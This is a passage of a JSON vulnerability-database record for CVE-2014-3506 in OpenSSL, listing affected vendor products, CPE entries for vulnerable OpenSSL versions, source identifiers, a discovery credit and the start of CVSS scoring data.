"model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "9.2-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "7.3-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "flashsystem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8400" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "36550" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.4" }, { "model": "release p7", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.3--" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "big-ip analytics hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "5.4-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "9.1-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0.00" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.8" }, { "model": "-release-p10", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x357087180" }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "66550" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "9.3-beta1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip analytics hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "cms r17ac.g", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "aura system platform sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "idatplex dx360 m4 water cooled type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79190" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.3" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3950x638370" }, { "model": "10.0-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "5745" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.0" }, { "model": "big-ip psm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "aura system platform sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.9" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "10.0-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "hp-ux b.11.31 (11i", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "v3)" }, { "model": "9.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip wom hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2408956" }, { "model": "flex system manager node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8731" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.4" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.2" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x8807903" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "-release-p8", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.10" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1.2" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "9.2-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "8.4-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip analytics hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "snapdrive for unix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "system m4 hd", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x36305466" }, { "model": "project openssl 0.9.8s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "-release-p17", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "7.0-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "9.1-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.0.9.8" }, { "model": "rc1", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "10.0-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x4407917" }, { "model": "flashsystem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v8400" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "system m4 hd", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x36505460" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x357087220" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.1" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "flex system manager node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8734" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "workcentre r14-11 spar", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7835072.010.134.32804" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.10" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "-stablepre122300", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.00" }, { "model": "storage server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "2.1" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "79700" }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "proventia network security controller 1.0.3350m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.4" }, { "model": "9.1-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.0" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "-prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.8" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "big-ip psm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.1.1" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "cms r17ac.h", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "contact optimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.0" }, { "model": "enterprise linux desktop workstation client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "big-ip edge gateway hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "9.2-rc1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.0-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "8.2-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.9" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.1" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1768" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "system m5 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x325054580" }, { "model": "-release-p42", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.4" }, { "model": "big-ip edge gateway hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.4" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-476" }, { "model": "big-ip psm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "6.4-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "6.4-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null } ], "sources": [ { "db": "BID", "id": "69076" }, { "db": "JVNDB", "id": "JVNDB-2014-003810" }, { "db": "CNNVD", "id": "CNNVD-201408-128" }, { "db": "NVD", "id": "CVE-2014-3506" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8za:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8m:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8w:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8v:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8x:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-3506" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Adam Langley of Google", "sources": [ { "db": "BID", "id": "69076" }, { "db": "CNNVD", "id": "CNNVD-201408-128" } ], "trust": 0.9 }, "cve": "CVE-2014-3506", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": 